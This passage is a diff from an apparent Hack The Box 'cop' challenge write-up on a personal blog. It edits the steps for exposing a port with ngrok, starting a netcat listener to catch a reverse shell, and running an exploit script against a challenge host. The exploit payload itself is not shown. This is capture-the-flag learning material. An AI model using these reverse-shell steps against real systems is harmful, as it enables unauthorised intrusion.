d3cl/d3cl.github.io/_posts/htb/challenges/2023-03-31-htb_challenges_cop.md

 print(response.content)
 ```

-Important to first install and run ngrok, replace `NGROK_URL` and `NGROK_PORT` in the payload:
+Important to first install and run [ngrok](https://0xdf.gitlab.io/2020/05/12/ngrok-ftw.html), replace `NGROK_URL` and `NGROK_PORT` in the payload:
 ```bash
 $ Downloads/ngrok tcp 9001
 ```

-Start a netcat session to catch the reverse shell:
+Start a netcat session, in a seperate terminal, to catch the reverse shell:
 ```bash
 $ nc -lvnp 9001
 ```

-After running the exploit script, we get a shell through netcat that was setup in a seperate terminal:
+After running the exploit script, we get a shell through our netcat listener:
 ```bash
 $ python3 exploit2.py 161.35.164.69:31934
 ```